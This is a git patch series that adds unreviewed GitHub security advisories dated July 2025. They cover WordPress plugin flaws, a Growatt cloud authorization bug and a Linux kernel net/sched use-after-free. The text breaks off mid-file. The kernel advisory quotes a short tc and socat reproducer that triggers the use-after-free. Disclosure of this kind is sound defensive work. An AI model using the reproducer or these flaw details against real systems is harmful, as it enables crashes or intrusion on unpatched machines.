| 48 +++++++++++++++++++ .../GHSA-xf7h-qhx6-p3pv.json | 44 +++++++++++++++++ 5 files changed, 232 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-4qgj-c63p-26g3/GHSA-4qgj-c63p-26g3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j8w3-hxm2-cw7f/GHSA-j8w3-hxm2-cw7f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-p35r-m625-775f/GHSA-p35r-m625-775f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vjh6-vph2-j2q4/GHSA-vjh6-vph2-j2q4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xf7h-qhx6-p3pv/GHSA-xf7h-qhx6-p3pv.json diff --git a/advisories/unreviewed/2025/07/GHSA-4qgj-c63p-26g3/GHSA-4qgj-c63p-26g3.json b/advisories/unreviewed/2025/07/GHSA-4qgj-c63p-26g3/GHSA-4qgj-c63p-26g3.json new file mode 100644 index 0000000000000..23a5061956150 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4qgj-c63p-26g3/GHSA-4qgj-c63p-26g3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qgj-c63p-26g3", + "modified": "2025-07-19T06:30:57Z", + "published": "2025-07-19T06:30:57Z", + "aliases": [ + "CVE-2025-6720" + ], + "details": "The Vchasno Kasa plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the clear_all_log() function in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to clear log files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6720" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mrkv-vchasno-kasa/trunk/classes/mrkv-setup.php#L245" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd03483a-f46c-4e17-8b58-df87b0ad7fa3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T06:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j8w3-hxm2-cw7f/GHSA-j8w3-hxm2-cw7f.json b/advisories/unreviewed/2025/07/GHSA-j8w3-hxm2-cw7f/GHSA-j8w3-hxm2-cw7f.json new file mode 100644 index 0000000000000..c5658752c7747 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j8w3-hxm2-cw7f/GHSA-j8w3-hxm2-cw7f.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8w3-hxm2-cw7f", + "modified": "2025-07-19T06:30:57Z", + "published": "2025-07-19T06:30:57Z", + "aliases": [ + "CVE-2025-29757" + ], + "details": "An incorrect authorisation check in the the 'plant transfer' function of the Growatt cloud service allowed a malicous attacker with a valid account to transfer any plant into his/her account.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:X/R:X/V:C/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29757" + }, + { + "type": "WEB", + "url": "https://csirt.divd.nl/CVE-2025-29757" + }, + { + "type": "WEB", + "url": "https://csirt.divd.nl/DIVD-2025-00011" + }, + { + "type": "WEB", + "url": "https://oss.growatt.com" + }, + { + "type": "WEB", + "url": "https://server.growatt.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T06:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p35r-m625-775f/GHSA-p35r-m625-775f.json b/advisories/unreviewed/2025/07/GHSA-p35r-m625-775f/GHSA-p35r-m625-775f.json new file mode 100644 index 0000000000000..54f453c5fc819 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-p35r-m625-775f/GHSA-p35r-m625-775f.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p35r-m625-775f", + "modified": "2025-07-19T06:30:57Z", + "published": "2025-07-19T06:30:57Z", + "aliases": [ + "CVE-2025-7697" + ], + "details": "The Integration for Google Sheets and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.1 via deserialization of untrusted input within the verify_field_val() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7697" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/integration-for-contact-form-7-and-google-sheets/tags/1.1.1/integration-for-contact-form-7-and-google-sheets.php#L923" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3329005" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/integration-for-contact-form-7-and-google-sheets/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a0146f17-35bd-45cf-b9c6-c4fce688efc2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T05:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vjh6-vph2-j2q4/GHSA-vjh6-vph2-j2q4.json b/advisories/unreviewed/2025/07/GHSA-vjh6-vph2-j2q4/GHSA-vjh6-vph2-j2q4.json new file mode 100644 index 0000000000000..ed88e65deb9ef --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vjh6-vph2-j2q4/GHSA-vjh6-vph2-j2q4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjh6-vph2-j2q4", + "modified": "2025-07-19T06:30:57Z", + "published": "2025-07-19T06:30:57Z", + "aliases": [ + "CVE-2025-7696" + ], + "details": "The Integration for Pipedrive and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.3 via deserialization of untrusted input within the verify_field_val() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7696" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/integration-for-contact-form-7-and-pipedrive/tags/1.2.3/integration-for-contact-form-7-and-pipedrive.php#L953" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3329002" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/integration-for-contact-form-7-and-pipedrive/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6980112b-a555-47a4-b2d7-f0187d52fc63?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T05:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xf7h-qhx6-p3pv/GHSA-xf7h-qhx6-p3pv.json b/advisories/unreviewed/2025/07/GHSA-xf7h-qhx6-p3pv/GHSA-xf7h-qhx6-p3pv.json new file mode 100644 index 0000000000000..b20782a18d77d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xf7h-qhx6-p3pv/GHSA-xf7h-qhx6-p3pv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf7h-qhx6-p3pv", + "modified": "2025-07-19T06:30:57Z", + "published": "2025-07-19T06:30:57Z", + "aliases": [ + "CVE-2025-6721" + ], + "details": "The Vchasno Kasa plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the mrkv_vchasno_kasa_wc_do_metabox_action() function in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to generate invoices for arbitrary orders.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6721" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mrkv-vchasno-kasa/trunk/classes/mrkv-setup.php#L395" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/57ad3525-3257-4727-ba07-468bf13a94e2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T06:15:24Z" + } +} \ No newline at end of file From 0ed9031207e2e46227731b3667c27f7b6ff71d2e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 09:31:54 +0000 Subject: [PATCH 026/323] Publish Advisories GHSA-6mr5-83vp-r7m7 GHSA-m6wr-j9jc-5v2m --- .../GHSA-6mr5-83vp-r7m7.json | 57 +++++++++++++++++++ .../GHSA-m6wr-j9jc-5v2m.json | 40 +++++++++++++ 2 files changed, 97 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-6mr5-83vp-r7m7/GHSA-6mr5-83vp-r7m7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m6wr-j9jc-5v2m/GHSA-m6wr-j9jc-5v2m.json diff --git a/advisories/unreviewed/2025/07/GHSA-6mr5-83vp-r7m7/GHSA-6mr5-83vp-r7m7.json b/advisories/unreviewed/2025/07/GHSA-6mr5-83vp-r7m7/GHSA-6mr5-83vp-r7m7.json new file mode 100644 index 0000000000000..d922e779eecb5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6mr5-83vp-r7m7/GHSA-6mr5-83vp-r7m7.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mr5-83vp-r7m7", + "modified": "2025-07-19T09:30:40Z", + "published": "2025-07-19T09:30:40Z", + "aliases": [ + "CVE-2025-38350" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: Always pass notifications when child class becomes empty\n\nCertain classful qdiscs may invoke their classes' dequeue handler on an\nenqueue operation. This may unexpectedly empty the child qdisc and thus\nmake an in-flight class passive via qlen_notify(). Most qdiscs do not\nexpect such behaviour at this point in time and may re-activate the\nclass eventually anyways which will lead to a use-after-free.\n\nThe referenced fix commit attempted to fix this behavior for the HFSC\ncase by moving the backlog accounting around, though this turned out to\nbe incomplete since the parent's parent may run into the issue too.\nThe following reproducer demonstrates this use-after-free:\n\n tc qdisc add dev lo root handle 1: drr\n tc filter add dev lo parent 1: basic classid 1:1\n tc class add dev lo parent 1: classid 1:1 drr\n tc qdisc add dev lo parent 1:1 handle 2: hfsc def 1\n tc class add dev lo parent 2: classid 2:1 hfsc rt m1 8 d 1 m2 0\n tc qdisc add dev lo parent 2:1 handle 3: netem\n tc qdisc add dev lo parent 3:1 handle 4: blackhole\n\n echo 1 | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888\n tc class delete dev lo classid 1:1\n echo 1 | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888\n\nSince backlog accounting issues leading to a use-after-frees on stale\nclass pointers is a recurring pattern at this point, this patch takes\na different approach. Instead of trying to fix the accounting, the patch\nensures that qdisc_tree_reduce_backlog always calls qlen_notify when\nthe child qdisc is empty. This solves the problem because deletion of\nqdiscs always involves a call to qdisc_reset() and / or\nqdisc_purge_queue() which ultimately resets its qlen to 0 thus causing\nthe following qdisc_tree_reduce_backlog() to report to the parent. Note\nthat this may call qlen_notify on passive classes multiple times. This\nis not a problem after the recent patch series that made all the\nclassful qdiscs qlen_notify() handlers idempotent.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38350" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/103406b38c600fec1fe375a77b27d87e314aea09" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3b290923ad2b23596208c1e29520badef4356a43" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7874c9c132e906a52a187d045995b115973c93fb" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a44acdd9e84a211989ff4b9b92bf3545d8456ad5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a553afd91f55ff39b1e8a1c4989a29394c9e0472" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e269f29e9395527bc00c213c6b15da04ebb35070" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e9921b57dca05ac5f4fa1fa8e993d4f0ee52e2b7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f680a4643c6f71e758d8fe0431a958e9a6a4f59d" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T07:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-m6wr-j9jc-5v2m/GHSA-m6wr-j9jc-5v2m.json b/advisories/unreviewed/2025/07/GHSA-m6wr-j9jc-5v2m/GHSA-m6wr-j9jc-5v2m.json new file mode 100644 index 0000000000000..3c5749fcff6c7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m6wr-j9jc-5v2m/GHSA-m6wr-j9jc-5v2m.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m6wr-j9jc-5v2m", + "modified": "2025-07-19T09:30:39Z", + "published": "2025-07-19T09:30:39Z", + "aliases": [ + "CVE-2025-6997" + ], + "details": "The ThemeREX Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.35.1.1 due to insufficient input sanitization and output escaping. The plugin’s SVG rendering routine calls the trx_addons_get_svg_from_file() function on an unvalidated 'svg' parameter supplied via the shortcode or Elementor widget settings, then outputs it via the trx_addons_show_layout() function. Because there is no check on the URL’s origin, scheme, or the SVG content itself, authenticated attackers, with Contributor-level access and above, can supply a remote SVG and inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6997" + }, + { + "type": "WEB", + "url": "https://themerex.net/wp/download_plugins/themerex-addons" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1b19017-b2f0-4c3b-b263-1fbec6f1dce4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T09:15:23Z" + } +} \ No newline at end of file From bccd78309b04b377945e0d207c8306b73dae8145 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 12:32:42 +0000 Subject: [PATCH 027/323] Publish Advisories GHSA-26vv-h7j3-gv3q GHSA-2rvr-53rv-hrfq GHSA-587g-h9jh-grjq GHSA-5x9w-6vgp-crh3 GHSA-6rrr-pqjc-jxwv GHSA-83wr-m322-27pr GHSA-943m-x5xx-45qh GHSA-cp8h-xgpv-mj82 GHSA-frrx-jc6h-v2mw GHSA-jq5m-r24m-pj59 GHSA-q987-357j-pqpq GHSA-rg2c-8v6w-j49r GHSA-x77v-68j6-p42v --- .../GHSA-26vv-h7j3-gv3q.json | 56 +++++++++++++++ .../GHSA-2rvr-53rv-hrfq.json | 60 ++++++++++++++++ .../GHSA-587g-h9jh-grjq.json | 52 ++++++++++++++ .../GHSA-5x9w-6vgp-crh3.json | 56 +++++++++++++++ .../GHSA-6rrr-pqjc-jxwv.json | 40 +++++++++++ .../GHSA-83wr-m322-27pr.json | 56 +++++++++++++++ .../GHSA-943m-x5xx-45qh.json | 52 ++++++++++++++ .../GHSA-cp8h-xgpv-mj82.json | 68 +++++++++++++++++++ .../GHSA-frrx-jc6h-v2mw.json | 56 +++++++++++++++ .../GHSA-jq5m-r24m-pj59.json | 56 +++++++++++++++ .../GHSA-q987-357j-pqpq.json | 56 +++++++++++++++ .../GHSA-rg2c-8v6w-j49r.json | 52 ++++++++++++++ .../GHSA-x77v-68j6-p42v.json | 33 +++++++++ 13 files changed, 693 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-26vv-h7j3-gv3q/GHSA-26vv-h7j3-gv3q.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2rvr-53rv-hrfq/GHSA-2rvr-53rv-hrfq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-587g-h9jh-grjq/GHSA-587g-h9jh-grjq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5x9w-6vgp-crh3/GHSA-5x9w-6vgp-crh3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6rrr-pqjc-jxwv/GHSA-6rrr-pqjc-jxwv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-83wr-m322-27pr/GHSA-83wr-m322-27pr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-943m-x5xx-45qh/GHSA-943m-x5xx-45qh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cp8h-xgpv-mj82/GHSA-cp8h-xgpv-mj82.json create mode 100644 advisories/unreviewed/2025/07/GHSA-frrx-jc6h-v2mw/GHSA-frrx-jc6h-v2mw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jq5m-r24m-pj59/GHSA-jq5m-r24m-pj59.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q987-357j-pqpq/GHSA-q987-357j-pqpq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rg2c-8v6w-j49r/GHSA-rg2c-8v6w-j49r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json diff --git a/advisories/unreviewed/2025/07/GHSA-26vv-h7j3-gv3q/GHSA-26vv-h7j3-gv3q.json b/advisories/unreviewed/2025/07/GHSA-26vv-h7j3-gv3q/GHSA-26vv-h7j3-gv3q.json new file mode 100644 index 0000000000000..337b5b7f8b9a1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-26vv-h7j3-gv3q/GHSA-26vv-h7j3-gv3q.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-26vv-h7j3-gv3q", + "modified": "2025-07-19T12:30:34Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2016-15043" + ], + "details": "The WP Mobile Detector plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in resize.php file in versions up to, and including, 3.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-15043" + }, + { + "type": "WEB", + "url": "https://aadityapurani.com/2016/06/03/mobile-detector-poc" + }, + { + "type": "WEB", + "url": "https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wp-mobile-detector/changelog" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/e4739674-eed4-417e-8c4d-2f5351b057cf" + }, + { + "type": "WEB", + "url": "https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a5d5dbd-36f0-4886-adf8-045ec9c2e306?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T10:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2rvr-53rv-hrfq/GHSA-2rvr-53rv-hrfq.json b/advisories/unreviewed/2025/07/GHSA-2rvr-53rv-hrfq/GHSA-2rvr-53rv-hrfq.json new file mode 100644 index 0000000000000..9e61fad4082f1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2rvr-53rv-hrfq/GHSA-2rvr-53rv-hrfq.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rvr-53rv-hrfq", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2015-10136" + ], + "details": "The GI-Media Library plugin for WordPress is vulnerable to Directory Traversal in versions before 3.0 via the 'fileid' parameter. This allows unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10136" + }, + { + "type": "WEB", + "url": "https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/1132677" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/gi-media-library/#developers" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/7754" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_gimedia_library_file_read" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f80c3b9-5148-42eb-9137-9c538184cda3?source=cve" + }, + { + "type": "WEB", + "url": "http://wordpressa.quantika14.com/repository/index.php?id=24" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T10:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-587g-h9jh-grjq/GHSA-587g-h9jh-grjq.json b/advisories/unreviewed/2025/07/GHSA-587g-h9jh-grjq/GHSA-587g-h9jh-grjq.json new file mode 100644 index 0000000000000..e2c2b12af0527 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-587g-h9jh-grjq/GHSA-587g-h9jh-grjq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-587g-h9jh-grjq", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2012-10019" + ], + "details": "The Front End Editor plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the upload.php file in versions before 2.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-10019" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/132303" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=600233%40front-end-editor&old=569105%40front-end-editor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20120712205339/https%3A//www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html" + }, + { + "type": "WEB", + "url": "https://www.cybersecurity-help.cz/vdb/SB2012070701" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f271c2e7-9d58-4dea-95d3-3ffc4ec7c3b2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T10:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5x9w-6vgp-crh3/GHSA-5x9w-6vgp-crh3.json b/advisories/unreviewed/2025/07/GHSA-5x9w-6vgp-crh3/GHSA-5x9w-6vgp-crh3.json new file mode 100644 index 0000000000000..4a09357c2d24d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5x9w-6vgp-crh3/GHSA-5x9w-6vgp-crh3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5x9w-6vgp-crh3", + "modified": "2025-07-19T12:30:34Z", + "published": "2025-07-19T12:30:34Z", + "aliases": [ + "CVE-2025-7818" + ], + "details": "A vulnerability was found in PHPGurukul Apartment Visitors Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /category.php of the component HTTP POST Request Handler. The manipulation of the argument categoryname leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7818" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/6" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316922" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316922" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616834" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T12:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6rrr-pqjc-jxwv/GHSA-6rrr-pqjc-jxwv.json b/advisories/unreviewed/2025/07/GHSA-6rrr-pqjc-jxwv/GHSA-6rrr-pqjc-jxwv.json new file mode 100644 index 0000000000000..1242f83b6dbb4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6rrr-pqjc-jxwv/GHSA-6rrr-pqjc-jxwv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rrr-pqjc-jxwv", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2015-10134" + ], + "details": "The Simple Backup plugin for WordPress is vulnerable to Arbitrary File Download in versions up to, and including, 2.7.10. via the download_backup_file function. This is due to a lack of capability checks and file type validation. This makes it possible for attackers to download sensitive files such as the wp-config.php file from the affected site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10134" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/131919" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29482b70-0ff2-4bb1-9d41-9cffb83b5ad0?source=cve" + } + ], + "database_specific": { + 